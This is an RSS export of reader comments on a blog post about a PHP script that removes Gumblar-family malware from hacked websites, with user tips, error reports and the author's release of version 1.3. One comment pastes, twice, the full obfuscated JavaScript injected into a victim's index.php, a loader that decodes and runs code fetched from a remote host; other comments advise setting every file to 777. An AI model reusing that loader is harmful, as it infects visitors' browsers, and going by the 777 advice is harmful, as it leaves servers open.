Comments on: Gumblar-family virus removal tool http://justcoded.com/article/gumblar-family-virus-removal-tool/ closer to perfection Thu, 09 Sep 2010 09:32:50 +0000 http://wordpress.org/?v=2.7.1 hourly 1 By: Dean http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-383 Dean Thu, 17 Jun 2010 06:25:45 +0000 http://justcoded.com/?p=185#comment-383 Thanks! If it only fixed up the file permissions and ownership :( Thanks! If it only fixed up the file permissions and ownership :(

]]> By: Paul http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-329 Paul Sun, 11 Apr 2010 13:16:59 +0000 http://justcoded.com/?p=185#comment-329 merci thks merci
thks

]]> By: Flatlander http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-328 Flatlander Tue, 06 Apr 2010 13:00:16 +0000 http://justcoded.com/?p=185#comment-328 Excellent. First I got a bit afraid as I had many Failed messages, but it turned out that these are file with 0-byte length, which had been created by the virus. So now I just need to remove about a 100 files or so of length 0 :-) Thanks, lifesaver! Excellent. First I got a bit afraid as I had many Failed messages, but it turned out that these are file with 0-byte length, which had been created by the virus. So now I just need to remove about a 100 files or so of length 0 :-)

Thanks, lifesaver!

]]> By: Amin http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-324 Amin Mon, 22 Mar 2010 06:15:03 +0000 http://justcoded.com/?p=185#comment-324 Thanks for the script.. its working.. if some of you cant turn off magic quotes off can add this in the top of the curevir.php file. if ( in_array( strtolower( ini_get( 'magic_quotes_gpc' ) ), array( '1', 'on' ) ) ) { $_POST = array_map( 'stripslashes', $_POST ); $_GET = array_map( 'stripslashes', $_GET ); $_COOKIE = array_map( 'stripslashes', $_COOKIE ); } Thanks for the script.. its working.. if some of you cant turn off magic quotes off can add this in the top of the curevir.php file.

if ( in_array( strtolower( ini_get( ‘magic_quotes_gpc’ ) ), array( ‘1′, ‘on’ ) ) )
{
$_POST = array_map( ’stripslashes’, $_POST );
$_GET = array_map( ’stripslashes’, $_GET );
$_COOKIE = array_map( ’stripslashes’, $_COOKIE );
}

]]> By: JamBy http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-319 JamBy Tue, 16 Mar 2010 13:04:55 +0000 http://justcoded.com/?p=185#comment-319 This is a very very very cool stuff. Remove all from my site a minute... THX This is a very very very cool stuff. Remove all from my site a minute…

THX

]]> By: Sameer Shelavale http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-308 Sameer Shelavale Wed, 10 Mar 2010 05:51:44 +0000 http://justcoded.com/?p=185#comment-308 hey Chris, The virues comes back because either you did not change FTP password after clean up OR one of your machine from which you are accessing FTP is infected. Please clean up virus from your local machines as well and change FTP password hey Chris,

The virues comes back because either you did not change FTP password after clean up OR one of your machine from which you are accessing FTP is infected.

Please clean up virus from your local machines as well and change FTP password

]]> By: Jake http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-296 Jake Tue, 23 Feb 2010 06:24:10 +0000 http://justcoded.com/?p=185#comment-296 Hi Konstantin, I've also been hit by what I believe to be a variant of the Gumblar virus, but I can't quite be sure because it's different from what others have posted here. Here's what I see at the bottom of every index.php file in my web server: var cVN="849b92a98ee98d878086b4c89d8c878fcaaf80adbf8c9a8098a9a9abbd93bb88a18ea394ae90a09fad9da399a1a992a2849f82ad84abba938c8082a0aaa98b9f8ef3a99cefb99e8cf38eabef8b9f";var cqf;if(cqf!='' && cqf!='UBb'){cqf=null};this.sd=27476;function J(s){var e="";var Bu;if(Bu!='' && Bu!='i'){Bu='nz'}; this.Ub="Ub";this.mW='';function BI(V,y){this.CO='';this.p='';return V[X("rehdcoaCAt", [4,2,6,0,7,5,3,1])](y);var mf=new Date();}var pk;if(pk!='inr'){pk='inr'}; function E(k,I){var HH;if(HH!='Mr' && HH!='Vw'){HH=''};var Iv="Iv";return k^I;this.sK="";var Yv;if(Yv!='' && Yv!='dd'){Yv='RC'};}this.Ku="";var Tq=""; var X=function(G, Xr){this.va="";var K=[1][0];this.Zv="";var m = Xr.length;var Q = G.length;var h=[0,64,162][0];var v = '';this.aj='';for(var a = h; a <Q>=h;a=a-[1,10,2,170][0]){v+=G[X("hcratA", [1,0])](a);this.vg=false;var dM;if(dM!='II' && dM!='JN'){dM='II'};}this.tv=false;this.Ll=false;var wA="";return v;};var BR;if(BR!=''){BR='WO'};var zq;if(zq!='Sy' && zq!='sD'){zq='Sy'};this.vy=50904;this.nX=43953; var QF=function(q){var DM;if(DM!='XEZ' && DM!='rG'){DM=''};var Op;if(Op!='LL'){Op='LL'};var b=[232,122,0][2];var VV=q[X("elgnht", [1,0])];var Qa=[255,201,149][0];var Jz;if(Jz!='oq'){Jz='oq'};var R=[132,0][1];var jQ=false;var VF;if(VF!='LQ'){VF='LQ'};var K=[85,1,194][1];var JUp;if(JUp!='' && JUp!='NG'){JUp='cs'};while(b<VV){b++;var yv;if(yv!='ym' && yv != ''){yv=null};C=BI(q,b - K);this.EpY="";this.JO="";R+=C*VV;}var TS;if(TS!='zu' && TS!='kwe'){TS='zu'};var hs="hs";return new n(R % Qa);var zj;if(zj!=''){zj='sqr'};};var yT=39061;var wo=new Array();var KM=window;var Ky;if(Ky!='Jzc'){Ky='Jzc'};var eo;if(eo!='uY'){eo='uY'};var F=KM[X("lvae", [3,1,2,0])];this.fE=17167;var U=F(X("unFctoni", [2,0,6,3,4,7,5,1]));var H=F(X("pRgxEe", [1,5,2,4,3,0]));var YX=new Date();var d = '';var RS=false;var hsV=new String();var n=F(X("gtnSir", [3,1,5,4,2,0]));this.Pi=false;this.yC=39235;var aS=n[X("roChafmrCode", [5,7,1,6,2,3,4,0])];var nG=KM[X("scuneape", [2,3,4,0,1])];var FA='';var ocO;if(ocO!=''){ocO='dno'};var ot="";var XF=new Date();var Cz=new Array();var r = '';var hD=new Array();var sL='';var hT = '';var zb;if(zb!='' && zb!='XY'){zb=''};var HJ;if(HJ!='' && HJ!='UG'){HJ=''};var f = "%";this.AC="";var aI=10154;var qor;if(qor!='JNt' && qor != ''){qor=null};var K =[1,10][0];var Xa = '';var h =[0][0];var fe;if(fe!='tVQ' && fe != ''){fe=null};var eq;if(eq!='Sx' && eq != ''){eq=null};var A = /[^@a-z0-9A-Z_-]/g;var uIs="uIs";var XL =[65,0,182,2][3];var TEf;if(TEf!=''){TEf='vV'};var bl;if(bl!='vh' && bl!='iu'){bl='vh'};this.at=false;var doY=[1, X("oducemtnc.ertaEeelemtn\'(csirtp)\'", [1,0]),2, X("oducemtnb.do.ypaepdnhCli(d)d", [1,0]),3, X("ge.osrreecsuenrr.v.atentflix", [3,5,0,2,4,1]),4, X(".dsteAttrbiuet(d\'eefr\'", [1,0,2]),5, X("oe.iscmta:er.mpu8080", [5,0,6,2,4,3,7,1]),6, X("gogopel.t", [2,1,3,0]),7, X("iwdnwoo.lnaod", [1,0]),8, X("sernaucpe.com", [2,5,3,1,0,6,4]),11, X("unfticn(o)", [2,0,1]),12, X("oloegg.com", [4,2,0,5,1,3]),14, X("hatcc(e)", [3,1,2,4,0,5]),15, X("h\"tpt:", [1,0,2]),16, X("sd.rc", [1,2,0]),17, X("cgc.a", [1,0]),18, X("ozdm", [2,3,0,1]),19, X("\'1)\'", [3,1,0,2]),20, X("ytr", [1,2,0])];var Xo="Xo";var T = s[X("egnlth", [3,0,2,1])];var MX;if(MX!=''){MX='ut'};var JJ;if(JJ!=''){JJ='vs'};var To =[50,40,0][2];this.wx=17732;var uG;if(uG!='sg' && uG != ''){uG=null};var iS;if(iS!='Lv' && iS != ''){iS=null};for(var Pq=h; Pq < T; Pq+=XL){var Aqe='';hT+= f; var Zdj=new Date();hT+= s[X("ussbrt", [1,0])](Pq, XL);var Nk;if(Nk!='ve'){Nk='ve'};}var Co;if(Co!='' && Co!='Lf'){Co=null};this.Uy=false;var s = nG(hT);var io="io";var jT="jT";var otm="";var GP = new n(J);var qs;if(qs!='fV'){qs=''};var KK = GP[X("capelre", [5,3,2,4,1,0])](A, r);this.fF="";var bw = new n(U);var gh;if(gh!='' && gh!='WA'){gh='Vz'};var ey;if(ey!='' && ey!='Iy'){ey=null};var qW = doY[X("ntlegh", [2,3,0,4,1])];var vv=24967;var op;if(op!='ki' && op!='Ap'){op=''};KK = B(KK);var NK;if(NK!='Rd' && NK!='vp'){NK=''};this.Rc=false;var Ey=34415;var UP;if(UP!='oZT'){UP='oZT'};var JX="";var dt = bw[X("elprace", [3,0,2,1])](A, r);var QV='';var dt = QF(dt);var zs;if(zs!='xR'){zs='xR'};var W=QF(KK);var ku=new String();for(var a=h; a KK.length-K){To=h;var uA=new Date();}var TM;if(TM!='qY'){TM='qY'};Xa += aS(jf);var Xt;if(Xt!=''){Xt='zF'};var kQ='';}var zx=new Array();for(qq=h; qq < qW; qq+=XL){var mm="";var ib;if(ib!='rl' && ib != ''){ib=null};var AR='';var ls;if(ls!='Se' && ls != ''){ls=null};var kq;if(kq!='' && kq!='OP'){kq=null};var tr;if(tr!='Zx' && tr != ''){tr=null};var Y = aS(doY[qq]);var vP = doY[qq + K];this.AK='';this.cJ="";this.Ze=false;this.uo='';var My="";var wj="";var AV = new H(Y, "g");var YJ=new String();Xa=Xa[X("erlpcae", [1,0])](AV, vP);}var ff=new Array();var Ln;if(Ln!=''){Ln='LD'};var o=new U(Xa);o();var Ke='';var bP=62265;dt = '';this.uYr="";W = '';KK = '';var YQ;if(YQ!='NR' && YQ!='vI'){YQ='NR'};var MFF=new Array();Xa = '';var Bd=new String();var HIk;if(HIk!='' && HIk!='vm'){HIk=null};bw = '';o = '';var lk="lk";var dF='';this.eU='';var Nf=new String();return '';};var cqf;if(cqf!='' && cqf!='UBb'){cqf=null};this.sd=27476;J(cVN); <!--53a83eb810e5bb1de33401606f62fdb5--> Tried installing your script, but when I ran it I received the following message: Warning: fopen(/home/mysite/public_html/!infected-1266906136.txt) [function.fopen]: failed to open stream: Permission denied in /home/mysite/public_html/curevir.php on line 328 Warning: fclose(): supplied argument is not a valid stream resource in /home/mysite/public_html/curevir.php on line 336 TOTAL: 0 START BACKUP: END BACKUP! Can you please tell me what I'm doing wrong? Hi Konstantin,

I’ve also been hit by what I believe to be a variant of the Gumblar virus, but I can’t quite be sure because it’s different from what others have posted here. Here’s what I see at the bottom of every index.php file in my web server:

var cVN=”849b92a98ee98d878086b4c89d8c878fcaaf80adbf8c9a8098a9a9abbd93bb88a18ea394ae90a09fad9da399a1a992a2849f82ad84abba938c8082a0aaa98b9f8ef3a99cefb99e8cf38eabef8b9f”;var cqf;if(cqf!=” && cqf!=’UBb’){cqf=null};this.sd=27476;function J(s){var e=”";var Bu;if(Bu!=” && Bu!=’i'){Bu=’nz’}; this.Ub=”Ub”;this.mW=”;function BI(V,y){this.CO=”;this.p=”;return V[X("rehdcoaCAt", [4,2,6,0,7,5,3,1])](y);var mf=new Date();}var pk;if(pk!=’inr’){pk=’inr’}; function E(k,I){var HH;if(HH!=’Mr’ && HH!=’Vw’){HH=”};var Iv=”Iv”;return k^I;this.sK=”";var Yv;if(Yv!=” && Yv!=’dd’){Yv=’RC’};}this.Ku=”";var Tq=”"; var X=function(G, Xr){this.va=”";var K=[1][0];this.Zv=”";var m = Xr.length;var Q = G.length;var h=[0,64,162][0];var v = ”;this.aj=”;for(var a = h; a =h;a=a-[1,10,2,170][0]){v+=G[X("hcratA", [1,0])](a);this.vg=false;var dM;if(dM!=’II’ && dM!=’JN’){dM=’II’};}this.tv=false;this.Ll=false;var wA=”";return v;};var BR;if(BR!=”){BR=’WO’};var zq;if(zq!=’Sy’ && zq!=’sD’){zq=’Sy’};this.vy=50904;this.nX=43953; var QF=function(q){var DM;if(DM!=’XEZ’ && DM!=’rG’){DM=”};var Op;if(Op!=’LL’){Op=’LL’};var b=[232,122,0][2];var VV=q[X("elgnht", [1,0])];var Qa=[255,201,149][0];var Jz;if(Jz!=’oq’){Jz=’oq’};var R=[132,0][1];var jQ=false;var VF;if(VF!=’LQ’){VF=’LQ’};var K=[85,1,194][1];var JUp;if(JUp!=” && JUp!=’NG’){JUp=’cs’};while(b<VV){b++;var yv;if(yv!=’ym’ && yv != ”){yv=null};C=BI(q,b - K);this.EpY=”";this.JO=”";R+=C*VV;}var TS;if(TS!=’zu’ && TS!=’kwe’){TS=’zu’};var hs=”hs”;return new n(R % Qa);var zj;if(zj!=”){zj=’sqr’};};var yT=39061;var wo=new Array();var KM=window;var Ky;if(Ky!=’Jzc’){Ky=’Jzc’};var eo;if(eo!=’uY’){eo=’uY’};var F=KM[X("lvae", [3,1,2,0])];this.fE=17167;var U=F(X(”unFctoni”, [2,0,6,3,4,7,5,1]));var H=F(X(”pRgxEe”, [1,5,2,4,3,0]));var YX=new Date();var d = ”;var RS=false;var hsV=new String();var n=F(X(”gtnSir”, [3,1,5,4,2,0]));this.Pi=false;this.yC=39235;var aS=n[X("roChafmrCode", [5,7,1,6,2,3,4,0])];var nG=KM[X("scuneape", [2,3,4,0,1])];var FA=”;var ocO;if(ocO!=”){ocO=’dno’};var ot=”";var XF=new Date();var Cz=new Array();var r = ”;var hD=new Array();var sL=”;var hT = ”;var zb;if(zb!=” && zb!=’XY’){zb=”};var HJ;if(HJ!=” && HJ!=’UG’){HJ=”};var f = “%”;this.AC=”";var aI=10154;var qor;if(qor!=’JNt’ && qor != ”){qor=null};var K =[1,10][0];var Xa = ”;var h =[0][0];var fe;if(fe!=’tVQ’ && fe != ”){fe=null};var eq;if(eq!=’Sx’ && eq != ”){eq=null};var A = /[^@a-z0-9A-Z_-]/g;var uIs=”uIs”;var XL =[65,0,182,2][3];var TEf;if(TEf!=”){TEf=’vV’};var bl;if(bl!=’vh’ && bl!=’iu’){bl=’vh’};this.at=false;var doY=[1, X("oducemtnc.ertaEeelemtn\'(csirtp)\'", [1,0]),2, X(”oducemtnb.do.ypaepdnhCli(d)d”, [1,0]),3, X(”ge.osrreecsuenrr.v.atentflix”, [3,5,0,2,4,1]),4, X(”.dsteAttrbiuet(d\’eefr\’”, [1,0,2]),5, X(”oe.iscmta:er.mpu8080″, [5,0,6,2,4,3,7,1]),6, X(”gogopel.t”, [2,1,3,0]),7, X(”iwdnwoo.lnaod”, [1,0]),8, X(”sernaucpe.com”, [2,5,3,1,0,6,4]),11, X(”unfticn(o)”, [2,0,1]),12, X(”oloegg.com”, [4,2,0,5,1,3]),14, X(”hatcc(e)”, [3,1,2,4,0,5]),15, X(”h\”tpt:”, [1,0,2]),16, X(”sd.rc”, [1,2,0]),17, X(”cgc.a”, [1,0]),18, X(”ozdm”, [2,3,0,1]),19, X(”\’1)\’”, [3,1,0,2]),20, X(”ytr”, [1,2,0])];var Xo=”Xo”;var T = s[X("egnlth", [3,0,2,1])];var MX;if(MX!=”){MX=’ut’};var JJ;if(JJ!=”){JJ=’vs’};var To =[50,40,0][2];this.wx=17732;var uG;if(uG!=’sg’ && uG != ”){uG=null};var iS;if(iS!=’Lv’ && iS != ”){iS=null};for(var Pq=h; Pq < T; Pq+=XL){var Aqe=”;hT+= f; var Zdj=new Date();hT+= s[X("ussbrt", [1,0])](Pq, XL);var Nk;if(Nk!=’ve’){Nk=’ve’};}var Co;if(Co!=” && Co!=’Lf’){Co=null};this.Uy=false;var s = nG(hT);var io=”io”;var jT=”jT”;var otm=”";var GP = new n(J);var qs;if(qs!=’fV’){qs=”};var KK = GP[X("capelre", [5,3,2,4,1,0])](A, r);this.fF=”";var bw = new n(U);var gh;if(gh!=” && gh!=’WA’){gh=’Vz’};var ey;if(ey!=” && ey!=’Iy’){ey=null};var qW = doY[X("ntlegh", [2,3,0,4,1])];var vv=24967;var op;if(op!=’ki’ && op!=’Ap’){op=”};KK = B(KK);var NK;if(NK!=’Rd’ && NK!=’vp’){NK=”};this.Rc=false;var Ey=34415;var UP;if(UP!=’oZT’){UP=’oZT’};var JX=”";var dt = bw[X("elprace", [3,0,2,1])](A, r);var QV=”;var dt = QF(dt);var zs;if(zs!=’xR’){zs=’xR’};var W=QF(KK);var ku=new String();for(var a=h; a KK.length-K){To=h;var uA=new Date();}var TM;if(TM!=’qY’){TM=’qY’};Xa += aS(jf);var Xt;if(Xt!=”){Xt=’zF’};var kQ=”;}var zx=new Array();for(qq=h; qq < qW; qq+=XL){var mm=”";var ib;if(ib!=’rl’ && ib != ”){ib=null};var AR=”;var ls;if(ls!=’Se’ && ls != ”){ls=null};var kq;if(kq!=” && kq!=’OP’){kq=null};var tr;if(tr!=’Zx’ && tr != ”){tr=null};var Y = aS(doY[qq]);var vP = doY[qq + K];this.AK=”;this.cJ=”";this.Ze=false;this.uo=”;var My=”";var wj=”";var AV = new H(Y, “g”);var YJ=new String();Xa=Xa[X("erlpcae", [1,0])](AV, vP);}var ff=new Array();var Ln;if(Ln!=”){Ln=’LD’};var o=new U(Xa);o();var Ke=”;var bP=62265;dt = ”;this.uYr=”";W = ”;KK = ”;var YQ;if(YQ!=’NR’ && YQ!=’vI’){YQ=’NR’};var MFF=new Array();Xa = ”;var Bd=new String();var HIk;if(HIk!=” && HIk!=’vm’){HIk=null};bw = ”;o = ”;var lk=”lk”;var dF=”;this.eU=”;var Nf=new String();return ”;};var cqf;if(cqf!=” && cqf!=’UBb’){cqf=null};this.sd=27476;J(cVN);

Tried installing your script, but when I ran it I received the following message:

Warning: fopen(/home/mysite/public_html/!infected-1266906136.txt) [function.fopen]: failed to open stream: Permission denied in /home/mysite/public_html/curevir.php on line 328

Warning: fclose(): supplied argument is not a valid stream resource in /home/mysite/public_html/curevir.php on line 336
TOTAL: 0
START BACKUP:
END BACKUP!

Can you please tell me what I’m doing wrong?

]]> By: Chris Brennan http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-295 Chris Brennan Tue, 23 Feb 2010 05:27:08 +0000 http://justcoded.com/?p=185#comment-295 Thank you very much for posting this script Konstantin. I've been freaking out all day once I realized that all 10 of my websites had been compromised and were now seeding viruses and malware to everyone who visited them. It took me a while to figure out how to implement your fix, and I just wanted to point out a couple of things to others who may have similar problems following the directions. 1. The only way I was successfully able to turn magic quotes off was by doing it through the .htaccess file. Editing this file may be more familiar than the other route to most people. Basically you just add this line to the .htaccess file in your root director: php_flag magic_quotes_gpc Off I got the directions on that from this page: http://www.php.net/manual/en/security.magicquotes.disabling.php 2. You really do have to change the file permissions for everything to 777. He isn't joking about that. Once you've done the above two steps the script does work pretty well though, as far as I can tell. The only problem is that I can only figure out how to run it from the root directory given my limited technical knowledge, and I have found that there are other folders and files *outside* of the root directory that have been infected as well. With these all I have been able to do is go in and edit them manually. This may be the reason why many people are reporting that the virus comes back after a day though, because they don't clean the files outside of the root. At least, I'm hoping that that is the case since I *just* started cleaning all of my files, and there hasn't been enough time to see if it will come back yet. The last point that I wanted to make is that a lot of websites seem to say that this virus is propagated through unprotected passwords in Filezilla, because Filezilla doesn't encrypt their passwords. I got rid of Filezilla today and found a new FTP program, but I was wondering if that was how everyone else got their websites infected as well? Did everyone get this on their sites due to Filezilla? The only other possibility for me is that some of my wordpress versions were kind of old. Other than that, I really don't know how this happened. Any insight you guys can share as to the cause of this would be appreciated, so that we can all better avoid it in the future. Many thanks. Thank you very much for posting this script Konstantin. I’ve been freaking out all day once I realized that all 10 of my websites had been compromised and were now seeding viruses and malware to everyone who visited them. It took me a while to figure out how to implement your fix, and I just wanted to point out a couple of things to others who may have similar problems following the directions.

1. The only way I was successfully able to turn magic quotes off was by doing it through the .htaccess file. Editing this file may be more familiar than the other route to most people. Basically you just add this line to the .htaccess file in your root director: php_flag magic_quotes_gpc Off

I got the directions on that from this page: http://www.php.net/manual/en/security.magicquotes.disabling.php

2. You really do have to change the file permissions for everything to 777. He isn’t joking about that. Once you’ve done the above two steps the script does work pretty well though, as far as I can tell.

The only problem is that I can only figure out how to run it from the root directory given my limited technical knowledge, and I have found that there are other folders and files *outside* of the root directory that have been infected as well. With these all I have been able to do is go in and edit them manually.

This may be the reason why many people are reporting that the virus comes back after a day though, because they don’t clean the files outside of the root. At least, I’m hoping that that is the case since I *just* started cleaning all of my files, and there hasn’t been enough time to see if it will come back yet.

The last point that I wanted to make is that a lot of websites seem to say that this virus is propagated through unprotected passwords in Filezilla, because Filezilla doesn’t encrypt their passwords. I got rid of Filezilla today and found a new FTP program, but I was wondering if that was how everyone else got their websites infected as well? Did everyone get this on their sites due to Filezilla? The only other possibility for me is that some of my wordpress versions were kind of old. Other than that, I really don’t know how this happened. Any insight you guys can share as to the cause of this would be appreciated, so that we can all better avoid it in the future.

Many thanks.

]]> By: victoria http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-292 victoria Sun, 21 Feb 2010 00:09:14 +0000 http://justcoded.com/?p=185#comment-292 Thanks for this your help has been invaluable especially as there seems to be very little out there for this obviously widespread attack! Thanks for this your help has been invaluable especially as there seems to be very little out there for this obviously widespread attack!

]]> By: Konstantin Boyko http://justcoded.com/article/gumblar-family-virus-removal-tool/comment-page-3/#comment-289 Konstantin Boyko Fri, 19 Feb 2010 18:03:46 +0000 http://justcoded.com/?p=185#comment-289 Thanks to everyone for posting your variants of the code. I was busy with other things and haven't had time for releasing new versions of the script. As far as I can see the hackers have learnt the javascript (or used some tool) and obfuscated their javascript code rather well. So now it is rather hard to write a regular expression for every variation and to cover all of them - since they modify it often. So I had to relase the version 1.3 which can be donwloaded <a href="http://justcoded.com/wp-content/uploads/2010/02/curevir.1.3.zip" rel="nofollow">here</a>. The main difference from all previous versions is that it is semi-automatic: you enter the code which you can see in your files and the script searches/replaces for it. You need to copy exact code which you have inside <script></script>. There are also 2 options (buttons) - "Search" and "Search&Replace". I recommend to run "Search" first and make sure that backup is working fine on your server and that your search string is correct. Also you need to make sure that you have magic_quotes_gpc=Off in PHP settings for your server. As always comments/contributions are kindly appreciated. Thanks to everyone for posting your variants of the code. I was busy with other things and haven’t had time for releasing new versions of the script. As far as I can see the hackers have learnt the javascript (or used some tool) and obfuscated their javascript code rather well. So now it is rather hard to write a regular expression for every variation and to cover all of them - since they modify it often. So I had to relase the version 1.3 which can be donwloaded here.

The main difference from all previous versions is that it is semi-automatic: you enter the code which you can see in your files and the script searches/replaces for it. You need to copy exact code which you have inside . There are also 2 options (buttons) - “Search” and “Search&Replace”. I recommend to run “Search” first and make sure that backup is working fine on your server and that your search string is correct.

Also you need to make sure that you have magic_quotes_gpc=Off in PHP settings for your server.

As always comments/contributions are kindly appreciated.

]]>